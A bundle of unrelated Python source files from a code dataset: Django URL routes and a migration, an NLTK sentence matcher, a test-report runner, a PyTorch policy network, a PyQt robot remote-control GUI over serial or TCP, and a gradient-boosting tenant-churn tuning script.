+{"seq_id":"216406239","text":"\"\"\"Admin_Projects URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\n\nfrom curr import views\nfrom curr import views_2\n\nurlpatterns = [\n \n url(r'^$', views.index, name='curr_index'),\n \n #20190528_104616\n url(r'^views_2/$', views_2.index, name='curr_index_2'),\n \n url(r'^updown_patterns/$', views.updown_patterns, name='updown_patterns'),\n \n url(r'^exec_updown_patterns/$', views.exec_updown_patterns, name='exec_updown_patterns'),\n \n url(r'^correlations/$', views.correlations, name='correlations'),\n \n url(r'^exec_correlations/$', views.exec_correlations, name='exec_correlations'),\n \n url(r'^basics/$', views.basics, name='basics'),\n \n url(r'^gen_peak_data/$', views.gen_peak_data, name='gen_peak_data'),\n \n url(r'^exec_Gen_PeakData/$', views.exec_Gen_PeakData, name='exec_Gen_PeakData'),\n \n url(r'^testers/$', views.testers, name='testers'),\n \n url(r'^tester_BuyUps_SellLows/$', views.tester_BuyUps_SellLows, name='tester_BuyUps_SellLows'),\n \n #20190528_104840\n url(r'^views_2/tester_BuyUps_SellLows/$', views_2.tester_BuyUps_SellLows, name='tester_BuyUps_SellLows_2'),\n \n url(r'^exec_Tester_BuyUps_SellLows/$', views.exec_Tester_BuyUps_SellLows, name='exec_Tester_BuyUps_SellLows'),\n \n # 20180918_134024\n url(r'^tester_BuyUps_SellLows__V2/$', views.tester_BuyUps_SellLows__V2, name='tester_BuyUps_SellLows__V2'),\n \n# url(r'^error/$', views.error, name='error'),\n \n \n]\n","sub_path":"prog/D-7/2_2/VIRTUAL/Admin_Projects/curr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160431864","text":"import nltk.corpus\nimport nltk.tokenize.punkt\nimport nltk.stem.snowball\nfrom nltk.corpus import wordnet\nimport string\nfrom nltk.tokenize import WordPunctTokenizer\n\n\n# refer article: https://bommaritollc.com/2014/06/12/fuzzy-match-sentences-python/\n# Get default English stopwords and extend with punctuation\nstopwords = nltk.corpus.stopwords.words('english')\nstopwords.extend(string.punctuation)\nstopwords.append('')\n\n\ndef get_wordnet_pos(pos_tag):\n if pos_tag[1].startswith('J'):\n return (pos_tag[0], wordnet.ADJ)\n elif pos_tag[1].startswith('V'):\n return (pos_tag[0], wordnet.VERB)\n elif pos_tag[1].startswith('N'):\n return (pos_tag[0], wordnet.NOUN)\n elif pos_tag[1].startswith('R'):\n return (pos_tag[0], wordnet.ADV)\n else:\n return (pos_tag[0], wordnet.NOUN)\n\n\n# Create tokenizer and stemmer\ntokenizer = WordPunctTokenizer()\nlemmatizer = nltk.stem.wordnet.WordNetLemmatizer()\n\n\ndef lemma_match_jaccard_index(a, b):\n \"\"\"Check if a and b are matches.\"\"\"\n pos_a = map(get_wordnet_pos, nltk.pos_tag(tokenizer.tokenize(a)))\n pos_b = map(get_wordnet_pos, nltk.pos_tag(tokenizer.tokenize(b)))\n lemmae_a = [lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_a \\\n if token.lower().strip(string.punctuation) not in stopwords]\n lemmae_b = [lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_b \\\n if token.lower().strip(string.punctuation) not in stopwords]\n index = len(set(lemmae_a).intersection(set(lemmae_b)))/float(len(set(lemmae_a).union(set(lemmae_b))))\n return 
index\n\n","sub_path":"LemmaSentenceMatcher_JaccardIndex.py","file_name":"LemmaSentenceMatcher_JaccardIndex.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382559907","text":"import os,sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nsys.path.append(BASE_DIR)\nfrom template.HTMLTestRunner_PY3 import HTMLTestRunner\nimport unittest\nimport time\n\n# 指定测试用例为当前文件夹下的 test_case 目录\ntest_dir = './tests'\ndiscover = unittest.defaultTestLoader.discover(test_dir, pattern='test_*.py')\n\n\nif __name__ == \"__main__\":\n\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n filename = './report/' + now + '_result.html'\n fp = open(filename, 'wb')\n runner = HTMLTestRunner(stream=fp,\n title='测试报告',\n description='报告详细如下: ')\n runner.run(discover)\n fp.close()","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25663086","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ANetwork(nn.Module): \n def __init__(self, state_size, action_size, seed, h1_size = 256, h2_size = 256):\n super(ANetwork, self).__init__()\n self.seed = torch.manual_seed(seed) # Random seed\n self.action_size = action_size\n self.state_size = state_size\n \n self.fc_layer1 = nn.Linear(state_size, h1_size)\n self.fc_layer2 = nn.Linear(h1_size, h2_size)\n self.fc_layer3 = nn.Linear(h2_size, action_size)\n \n\n def forward(self, state):\n x = F.relu(self.fc_layer1(state))\n x = F.relu(self.fc_layer2(x))\n return F.softmax(self.fc_layer3(x), dim = 1)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500799505","text":"# By Martin Rioux -- martin.rioux2@gmail.com\n# To use as you wish with proper credit!\n\n\ndef specialKeyAction(qt, e, state):\n if e.key() == QtCore.Qt.Key_Escape:\n qt.close()\n\n # THIS SECTION IS USED TO BIND KEY AND STATE TO SEND SERIAL DATA\n if e.key() == QtCore.Qt.Key_W and state == \"pressed\":\n qt.sendSerialData(\"PW\")\n if e.key() == QtCore.Qt.Key_W and state == \"released\":\n qt.sendSerialData(\"RW\")\n if e.key() == QtCore.Qt.Key_A and state == \"pressed\":\n qt.sendSerialData(\"PA\")\n if e.key() == QtCore.Qt.Key_A and state == \"released\":\n qt.sendSerialData(\"RA\")\n if e.key() == QtCore.Qt.Key_S and state == \"pressed\":\n qt.sendSerialData(\"PS\")\n if e.key() == QtCore.Qt.Key_S and state == \"released\":\n qt.sendSerialData(\"RS\")\n if e.key() == QtCore.Qt.Key_D and state == \"pressed\":\n qt.sendSerialData(\"PD\")\n if e.key() == QtCore.Qt.Key_D and state == \"released\":\n qt.sendSerialData(\"RD\")\n if e.key() == QtCore.Qt.Key_I and state == \"pressed\":\n qt.sendSerialData(\"PI\")\n if e.key() == QtCore.Qt.Key_I and state == \"released\":\n qt.sendSerialData(\"RI\")\n if e.key() == QtCore.Qt.Key_J and state == \"pressed\":\n qt.sendSerialData(\"PJ\")\n if e.key() == QtCore.Qt.Key_J and state == \"released\":\n qt.sendSerialData(\"RJ\")\n if e.key() == QtCore.Qt.Key_K and state == \"pressed\":\n qt.sendSerialData(\"PK\")\n if e.key() == QtCore.Qt.Key_K and state == \"released\":\n qt.sendSerialData(\"RK\")\n if e.key() == QtCore.Qt.Key_L and state == \"pressed\":\n qt.sendSerialData(\"PL\")\n if e.key() == QtCore.Qt.Key_L and state == \"released\":\n 
qt.sendSerialData(\"RL\")\n\n if e.key() == QtCore.Qt.Key_1 and state == \"pressed\":\n qt.sendSerialData(\"PB1\")\n if e.key() == QtCore.Qt.Key_2 and state == \"pressed\":\n qt.sendSerialData(\"PB2\")\n if e.key() == QtCore.Qt.Key_7 and state == \"pressed\":\n qt.sendSerialData(\"PB7\")\n if e.key() == QtCore.Qt.Key_8 and state == \"pressed\":\n qt.sendSerialData(\"PB8\")\n\n if e.key() == QtCore.Qt.Key_G and state == \"pressed\":\n qt.sendSerialData(\"PG\")\n\n if e.key() == QtCore.Qt.Key_T and state == \"pressed\":\n qt.sendSerialData(\"PT\")\n if e.key() == QtCore.Qt.Key_T and state == \"released\":\n qt.sendSerialData(\"RT\")\n\n if e.key() == QtCore.Qt.Key_B and state == \"pressed\":\n qt.sendSerialData(\"PB\")\n if e.key() == QtCore.Qt.Key_B and state == \"released\":\n qt.sendSerialData(\"RB\")\n if e.key() == QtCore.Qt.Key_N and state == \"pressed\":\n qt.sendSerialData(\"PN\")\n if e.key() == QtCore.Qt.Key_N and state == \"released\":\n qt.sendSerialData(\"RN\")\n if e.key() == QtCore.Qt.Key_M and state == \"pressed\":\n qt.sendSerialData(\"PM\")\n if e.key() == QtCore.Qt.Key_M and state == \"released\":\n qt.sendSerialData(\"RM\")\n\n\n if e.key() == QtCore.Qt.Key_H and state == \"pressed\":\n qt.sendSerialData(\"PH\")\n if e.key() == QtCore.Qt.Key_H and state == \"released\":\n qt.sendSerialData(\"RH\")\n\n if e.key() == QtCore.Qt.Key_0:\n qt.sendSerialData(\"STOP\")\n\n\n \n\ndef receivedDataHandler(qt, data):\n data = data.rstrip()\n\n # if data == \"YO\":\n # qt.total += (time.time()*1000 - qt.timer)\n # qt.qte += 1\n # print(qt.total/qt.qte)\n\n\n\n\n\n\n\n\n\n\nDEBUG_MODE = False\n# REAL STUFF\n\n\nimport sys, threading, time\nfrom PyQt4 import QtGui, QtCore\nfrom serial import Serial\nimport socket\n\n\nclass RoboControl(QtGui.QWidget):\n\n def __init__(self):\n super(RoboControl, self).__init__()\n self.timer = 0\n self.total = 0\n self.qte = 0\n self.PRESSED_KEYS = set() # key currently pressed\n self.COMMAND_TO_SEND = []\n self.SERIAL_DATA_SENT = []\n self.SERIAL_DATA_RECEIVED = []\n self.SERIAL_INPUT = \"\"\n self.CONNECTED = DEBUG_MODE\n self.COM_MODE = \"SOCKET\" #SOCKET or SERIAL\n # GENERAL CONFIG\n self.READ_TIMEOUT = 0.0002 # 0.002 for serial, 0.005 socket or more?, finally 0.0002 is good?\n # IF SERIAL MODE\n self.DEVICE = \"/dev/ttyACM0\"\n self.BAUD = 115200\n # IF SOCKET MODE\n self.ADDRESS = \"192.168.8.1\"\n self.RECV_BUFFER = 1024\n self.PORT = 7777\n self.THREAD_SLEEP = 0.0002\n self.initUI()\n self.displayThreadData()\n\n self.running = 1\n self.thread1 = threading.Thread(target=self.serialThread)\n self.thread1.start()\n\n def connectToArduino(self):\n\n self.total = 0\n self.qte = 0\n if self.CONNECTED:\n self.disconnectArduino()\n return \n if self.COM_MODE == \"SERIAL\":\n try:\n self.DEVICE = str(self.deviceInput.text())\n self.BAUD = int(self.baudInput.text())\n self.READ_TIMEOUT = float(self.readTimeoutSerialInput.text())\n self.THREAD_SLEEP = float(self.threadSleepSerialInput.text())\n if self.THREAD_SLEEP <= 0:\n self.THREAD_SLEEP = 0.0000001\n self.threadSleepSerialInput.setText(\"0.0000001\")\n self.ser = Serial(self.DEVICE, self.BAUD)\n self.ser.timeout = 2\n self.CONNECTED = True\n self.ser.timeout = self.READ_TIMEOUT\n self.connectionStatus.setText(\"Status: CONNECTED\")\n self.connectButtonSerial.setText(\"Disconnect\")\n except:\n self.CONNECTED = False\n self.connectionStatus.setText(\"Status: CONNECTION FAILED\")\n\n if self.COM_MODE == \"SOCKET\":\n try:\n self.ADDRESS = self.addressInput.text()\n self.PORT = 
int(self.portInput.text())\n self.RECV_BUFFER = int(self.comBufferInput.text())\n self.READ_TIMEOUT = float(self.readTimeoutSocketInput.text())\n self.THREAD_SLEEP = float(self.threadSleepSocketInput.text())\n if self.THREAD_SLEEP <= 0:\n self.THREAD_SLEEP = 0.0000001\n self.threadSleepSocketInput.setText(\"0.0000001\")\n self.ser = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.ser.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.ser.setblocking(0)\n self.ser.settimeout(2)\n self.ser.connect((self.ADDRESS, self.PORT))\n self.ser.settimeout(self.READ_TIMEOUT)\n self.CONNECTED = True\n self.connectionStatus.setText(\"Status: CONNECTED\")\n self.connectButtonSocket.setText(\"Disconnect\")\n except:\n self.CONNECTED = False\n self.connectionStatus.setText(\"Status: CONNECTION FAILED\")\n\n def initUI(self):\n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n\n self.selectCom = QtGui.QComboBox()\n self.selectCom.addItem(\"SERIAL\")\n self.selectCom.addItem(\"SOCKET\")\n self.selectCom.currentIndexChanged.connect(self.changeComType)\n self.selectCom.setFixedSize(200, 30)\n self.grid.addWidget(self.selectCom, 0, 0)\n \n self.connectionStatus = QtGui.QLabel('Status: OFFLINE')\n self.connectionStatus.setFont(QtGui.QFont('SansSerif', 14))\n credit = QtGui.QLabel(\"RoboControl \\nBy Martin Rioux - martin.rioux2@gmail.com\")\n credit.setFont(QtGui.QFont('SansSerif', 8))\n\n status_and_credit = QtGui.QHBoxLayout()\n status_and_credit.addWidget(self.connectionStatus)\n status_and_credit.addWidget(credit)\n self.grid.addLayout(status_and_credit, 0, 1)\n\n #GENERAL CONFIGS\n\n self.configs = QtGui.QHBoxLayout()\n self.grid.addLayout(self.configs, 1, 0, 1, 2)\n\n ## SERIAL OUT ##\n serialOutLabel = QtGui.QLabel('Serial Out')\n self.serialOutText = QtGui.QTextEdit()\n self.serialOutText.setReadOnly(True)\n\n outBox = QtGui.QVBoxLayout()\n outBox.addWidget(serialOutLabel)\n outBox.addWidget(self.serialOutText)\n self.grid.addLayout(outBox, 2, 0)\n\n ## SERIAL IN ##\n serialInLabel = QtGui.QLabel('Serial In')\n self.serialInText = QtGui.QTextEdit()\n self.serialInText.setReadOnly(True)\n\n inBox = QtGui.QVBoxLayout()\n inBox.addWidget(serialInLabel)\n inBox.addWidget(self.serialInText)\n self.grid.addLayout(inBox, 2, 1)\n\n self.setLayout(self.grid)\n\n self.setGeometry(0,0,1024,768)\n self.center()\n self.setWindowTitle('RoboControl')\n self.show()\n self.changeComType()\n\n def deleteConfig(self, layout):\n if layout is not None:\n while layout.count():\n item = layout.takeAt(0)\n widget = item.widget()\n if widget is not None:\n widget.deleteLater()\n else:\n self.deleteConfig(item.layout())\n\n def buildSerialConfigs(self):\n self.deviceLabel = QtGui.QLabel('Device')\n self.deviceInput = QtGui.QLineEdit(self.DEVICE)\n self.baudLabel = QtGui.QLabel('Baud')\n self.baudInput = QtGui.QLineEdit(str(self.BAUD))\n self.baudInput.setValidator(QtGui.QIntValidator())\n self.readTimeoutSerialLabel = QtGui.QLabel('Timeout (sec) [0.0002]')\n self.readTimeoutSerialInput = QtGui.QLineEdit(str(self.READ_TIMEOUT))\n self.readTimeoutSerialInput.setValidator(QtGui.QDoubleValidator())\n self.threadSleepSerialLabel = QtGui.QLabel('Thread sleep (sec) [0.0002]')\n self.threadSleepSerialInput = QtGui.QLineEdit(str(self.THREAD_SLEEP))\n self.threadSleepSerialInput.setValidator(QtGui.QDoubleValidator())\n self.connectButtonSerialLabel = QtGui.QLabel('')\n self.connectButtonSerial = QtGui.QPushButton('Connect', self)\n self.connectButtonSerial.clicked.connect(self.connectToArduino)\n\n device = 
QtGui.QVBoxLayout()\n device.addWidget(self.deviceLabel)\n device.addWidget(self.deviceInput)\n baud = QtGui.QVBoxLayout()\n baud.addWidget(self.baudLabel)\n baud.addWidget(self.baudInput)\n readtimeoutSerial = QtGui.QVBoxLayout()\n readtimeoutSerial.addWidget(self.readTimeoutSerialLabel)\n readtimeoutSerial.addWidget(self.readTimeoutSerialInput)\n threadSleepSerial = QtGui.QVBoxLayout()\n threadSleepSerial.addWidget(self.threadSleepSerialLabel)\n threadSleepSerial.addWidget(self.threadSleepSerialInput)\n connectBSerial = QtGui.QVBoxLayout()\n connectBSerial.addWidget(self.connectButtonSerialLabel)\n connectBSerial.addWidget(self.connectButtonSerial)\n \n self.configs.addLayout(device)\n self.configs.addLayout(baud)\n self.configs.addLayout(readtimeoutSerial)\n self.configs.addLayout(threadSleepSerial)\n self.configs.addLayout(connectBSerial)\n\n def buildSocketConfigs(self):\n self.addressLabel = QtGui.QLabel('Address')\n self.addressInput = QtGui.QLineEdit(self.ADDRESS)\n self.portLabel = QtGui.QLabel('Port')\n self.portInput = QtGui.QLineEdit(str(self.PORT))\n self.portInput.setValidator(QtGui.QIntValidator())\n self.comBufferLabel = QtGui.QLabel('Buffer [1024]')\n self.comBufferInput = QtGui.QLineEdit(str(self.RECV_BUFFER))\n self.comBufferInput.setValidator(QtGui.QIntValidator())\n self.readTimeoutSocketLabel = QtGui.QLabel('Timeout (sec) [0.0002]')\n self.readTimeoutSocketInput = QtGui.QLineEdit(str(self.READ_TIMEOUT))\n self.readTimeoutSocketInput.setValidator(QtGui.QDoubleValidator())\n self.threadSleepSocketLabel = QtGui.QLabel('Thread sleep (sec) [0.0002]')\n self.threadSleepSocketInput = QtGui.QLineEdit(str(self.THREAD_SLEEP))\n self.threadSleepSocketInput.setValidator(QtGui.QDoubleValidator())\n self.connectButtonSocketLabel = QtGui.QLabel('')\n self.connectButtonSocket = QtGui.QPushButton('Connect', self)\n self.connectButtonSocket.clicked.connect(self.connectToArduino)\n\n address = QtGui.QVBoxLayout()\n address.addWidget(self.addressLabel)\n address.addWidget(self.addressInput)\n port = QtGui.QVBoxLayout()\n port.addWidget(self.portLabel)\n port.addWidget(self.portInput)\n comBuffer = QtGui.QVBoxLayout()\n comBuffer.addWidget(self.comBufferLabel)\n comBuffer.addWidget(self.comBufferInput)\n readtimeoutSocket = QtGui.QVBoxLayout()\n readtimeoutSocket.addWidget(self.readTimeoutSocketLabel)\n readtimeoutSocket.addWidget(self.readTimeoutSocketInput)\n threadSleepSocket = QtGui.QVBoxLayout()\n threadSleepSocket.addWidget(self.threadSleepSocketLabel)\n threadSleepSocket.addWidget(self.threadSleepSocketInput)\n connectBSocket = QtGui.QVBoxLayout()\n connectBSocket.addWidget(self.connectButtonSocketLabel)\n connectBSocket.addWidget(self.connectButtonSocket)\n\n self.configs.addLayout(address)\n self.configs.addLayout(port)\n self.configs.addLayout(comBuffer)\n self.configs.addLayout(readtimeoutSocket)\n self.configs.addLayout(threadSleepSocket)\n self.configs.addLayout(connectBSocket)\n\n def changeComType(self):\n self.disconnectArduino()\n self.COM_MODE = self.selectCom.currentText()\n self.deleteConfig(self.configs)\n if self.COM_MODE == \"SERIAL\":\n self.displaySerialConfig()\n elif self.COM_MODE == \"SOCKET\":\n self.displaySocketConfig()\n\n def displaySerialConfig(self):\n self.buildSerialConfigs()\n\n def displaySocketConfig(self):\n self.buildSocketConfigs()\n\n def disconnectArduino(self):\n try:\n self.ser.close()\n except: pass\n if self.CONNECTED:\n if self.COM_MODE == \"SOCKET\":\n self.connectButtonSocket.setText(\"Connect\")\n if self.COM_MODE == \"SERIAL\":\n 
self.connectButtonSerial.setText(\"Connect\")\n self.CONNECTED = False\n self.connectionStatus.setText(\"Status: OFFLINE\")\n\n def center(self):\n qr = self.frameGeometry()\n cp = QtGui.QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def onChanged(self, text):\n self.lbl.setText(text)\n self.lbl.adjustSize() \n\n def keyPressEvent(self, e):\n if e.isAutoRepeat() == True:\n return\n specialKeyAction(self, e, \"pressed\")\n e.accept()\n\n def keyReleaseEvent(self, e):\n if e.isAutoRepeat() == True:\n return\n specialKeyAction(self, e, \"released\") \n e.accept()\n\n def sendSerialData(self, data):\n if self.CONNECTED:\n self.COMMAND_TO_SEND.append(data + \"\\n\")\n\n\n def displayThreadData(self):\n while len(self.SERIAL_DATA_SENT) >= 1:\n data = self.SERIAL_DATA_SENT[0]\n del self.SERIAL_DATA_SENT[0]\n self.serialOutText.moveCursor(QtGui.QTextCursor.End)\n self.serialOutText.insertPlainText(data)\n\n while len(self.SERIAL_DATA_RECEIVED) >= 1:\n data = self.SERIAL_DATA_RECEIVED[0]\n del self.SERIAL_DATA_RECEIVED[0]\n self.serialInText.moveCursor(QtGui.QTextCursor.End)\n self.serialInText.insertPlainText(data)\n receivedDataHandler(self, data)\n\n QtCore.QTimer.singleShot(10, self.displayThreadData)\n\n def closeEvent(self, event):\n reply = QtGui.QMessageBox.question(self, 'Warning',\n \"Really want to exit?\", QtGui.QMessageBox.Yes | \n QtGui.QMessageBox.No, QtGui.QMessageBox.No)\n if reply == QtGui.QMessageBox.Yes:\n self.running = 0\n event.accept()\n else:\n event.ignore() \n \n def serialThread(self):\n while self.running:\n if self.CONNECTED:\n data = \"\"\n try:\n if self.COM_MODE == \"SERIAL\":\n data += self.ser.readline()\n if self.COM_MODE == \"SOCKET\":\n data = self.ser.recv(self.RECV_BUFFER)\n except: pass\n \n if data != \"\":\n self.SERIAL_INPUT += data\n if (self.SERIAL_INPUT.find(\"\\n\") != -1): \n # print(self.SERIAL_INPUT)\n self.SERIAL_DATA_RECEIVED.append(self.SERIAL_INPUT)\n self.SERIAL_INPUT = \"\"\n\n # print (self.ser.out_waiting)\n if len(self.COMMAND_TO_SEND) >= 1:\n data = self.COMMAND_TO_SEND[0]\n del self.COMMAND_TO_SEND[0]\n self.SERIAL_DATA_SENT.append(data)\n if DEBUG_MODE == False:\n try: \n if self.COM_MODE == \"SERIAL\":\n self.ser.write(data)\n if self.COM_MODE == \"SOCKET\":\n self.ser.send(data)\n except: pass\n \n\n # time.sleep(0.0000002) #MAGIC VALUE?\n time.sleep(self.THREAD_SLEEP)\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = RoboControl()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()","sub_path":"remote_serial_tcp_Arduino_controller/remote_control.py","file_name":"remote_control.py","file_ext":"py","file_size_in_byte":17385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155766375","text":"import pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom numpy import *\nfrom sklearn import metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\n\n\n\n\n#1.数据预处理\nmodelData = pd.read_csv(path+'/数据/modelData.csv', header = 0)\nallFeatures = list(modelData.columns)\n#去除租客ID和中介ID\nallFeatures.remove('CUST_ID')\nallFeatures.remove('Agent_IND')\n\n\n\n#划分数据集\nX_train, X_test, y_train, y_test = train_test_split(modelData[allFeatures],modelData['CHURN_CUST_IND'], test_size=0.5,random_state=9)\n\ny_train.value_counts()\n\n\n\n#使用默认参数\ngbm0 = 
GradientBoostingClassifier(random_state=10)\ngbm0.fit(X_train,y_train)\ny_pred = gbm0.predict(X_test)\ny_predprob = gbm0.predict_proba(X_test)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_test, y_pred))\nprint (\"AUC Score (Testing): %f\" % metrics.roc_auc_score(y_test, y_predprob))\n\ny_pred2 = gbm0.predict(X_train)\ny_predprob2 = gbm0.predict_proba(X_train)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_train, y_pred2))\nprint (\"AUC Score (Training): %f\" % metrics.roc_auc_score(y_train, y_predprob2))\n\n\n# Tuning step 1\nparam_test1 = {'n_estimators':range(20,81,10)}\ngsearch1 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, min_samples_split=300,\n min_samples_leaf=20,max_depth=8,max_features='sqrt', subsample=0.8,random_state=10),\n param_grid = param_test1, scoring='roc_auc',iid=False,cv=5)\ngsearch1.fit(X_train,y_train)\ngsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_\n\nparam_test2 = {'max_depth':range(3,14,2), 'min_samples_split':range(100,801,200)}\ngsearch2 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70, min_samples_leaf=20,\n max_features='sqrt', subsample=0.8, random_state=10),\n param_grid = param_test2, scoring='roc_auc',iid=False, cv=5)\ngsearch2.fit(X_train,y_train)\ngsearch2.grid_scores_, gsearch2.best_params_, gsearch2.best_score_\n\nparam_test3 = {'min_samples_split':range(400,1001,100), 'min_samples_leaf':range(60,101,10)}\ngsearch3 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9,\n max_features='sqrt', subsample=0.8, random_state=10),\n param_grid = param_test3, scoring='roc_auc',iid=False, cv=5)\ngsearch3.fit(X_train,y_train)\ngsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_\n\n\n# select n_estimators\ngbm1 = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =500, max_features='sqrt', subsample=0.8, random_state=10)\ngbm1.fit(X_train,y_train)\ny_pred1 = gbm1.predict(X_train)\ny_predprob1= gbm1.predict_proba(X_train)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_train, y_pred1))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_train, y_predprob1))\n\ny_pred2 = gbm1.predict(X_test)\ny_predprob2= gbm1.predict_proba(X_test)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_test, y_pred2))\nprint (\"AUC Score (Testing): %f\" % metrics.roc_auc_score(y_test, y_predprob2))\n\n\n# select max_features\nparam_test4 = {'max_features':range(5,31,2)}\ngsearch4 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =500, subsample=0.8, random_state=10),\n param_grid = param_test4, scoring='roc_auc',iid=False, cv=5)\ngsearch4.fit(X_train,y_train)\ngsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_\n\n# select subsample\nparam_test5 = {'subsample':[0.6,0.7,0.75,0.8,0.85,0.9]}\ngsearch5 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =500, max_features=28, random_state=10),\n param_grid = param_test5, scoring='roc_auc',iid=False, cv=5)\ngsearch5.fit(X_train,y_train)\ngsearch5.grid_scores_, gsearch5.best_params_, gsearch5.best_score_\n\n# select learning rate and min_samples_split\ngbm2 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.05, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =1000, 
max_features=28, random_state=10,subsample=0.8),\n param_grid = param_test5, scoring='roc_auc',iid=False, cv=5)\ngbm2.fit(X_train,y_train)\n\ny_pred1 = gbm2.predict(X_train)\ny_predprob1= gbm2.predict_proba(X_train)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_train, y_pred1))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_train, y_predprob1))\n\ny_pred2 = gbm2.predict(X_test)\ny_predprob2= gbm2.predict_proba(X_test)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_test, y_pred2))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_test, y_predprob2))\n\n\nclf = GradientBoostingClassifier(learning_rate=0.05, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =1000, max_features=28, random_state=10,subsample=0.8)\nclf.fit(X_train, y_train)\nimportances = clf.feature_importances_\n#按照特征重要度排序\nfeatures_sorted = argsort(-importances)\nimport_feautres = [allFeatures[i] for i in features_sorted]\n","sub_path":"Tenant Churn(GBDT).py","file_name":"Tenant Churn(GBDT).py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3859780","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nimport admission.models\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='OfferStudent',\n fields=[\n ('id', models.IntegerField(serialize=False, primary_key=True)),\n ('student_id', models.UUIDField()),\n ('title', models.TextField()),\n ('name', models.CharField(max_length=127)),\n ('school_level', models.CharField(max_length=8)),\n ('major', models.CharField(max_length=16)),\n ('major_type', models.CharField(max_length=16)),\n ('gpa', models.FloatField()),\n ('chinese_name', models.CharField(max_length=255)),\n ('english_name', models.CharField(max_length=255)),\n ('country', models.CharField(max_length=32)),\n ('project', models.CharField(max_length=255)),\n ('offer_major', models.CharField(max_length=255)),\n ('offer_major_type', models.CharField(max_length=255)),\n ('offer_type', models.CharField(max_length=16)),\n ('received_time', models.DateField()),\n ('is_admitted', models.BooleanField()),\n ('is_chosen', models.BooleanField()),\n ('advisor', models.IntegerField()),\n ('publish_status', models.IntegerField()),\n ],\n options={\n 'db_table': 'offer_student_school_view',\n 'managed': False,\n },\n ),\n migrations.CreateModel(\n name='Admission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.TextField(verbose_name='Title')),\n ('student_pros', models.TextField(default=None, null=True, verbose_name='Student Pros', blank=True)),\n ('student_cons', models.TextField(default=None, null=True, verbose_name='Student Cons', blank=True)),\n ('plan', models.TextField(default=None, null=True, verbose_name='Plan', blank=True)),\n ('advice', models.TextField(default=None, null=True, verbose_name='Advice', blank=True)),\n ],\n options={\n 'verbose_name': 'Admission Info',\n },\n ),\n migrations.CreateModel(\n name='EducationalHistory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('degree', models.CharField(max_length=8, verbose_name='Degree')),\n ('school', models.CharField(default=None, max_length=127, null=True, verbose_name='School Name', 
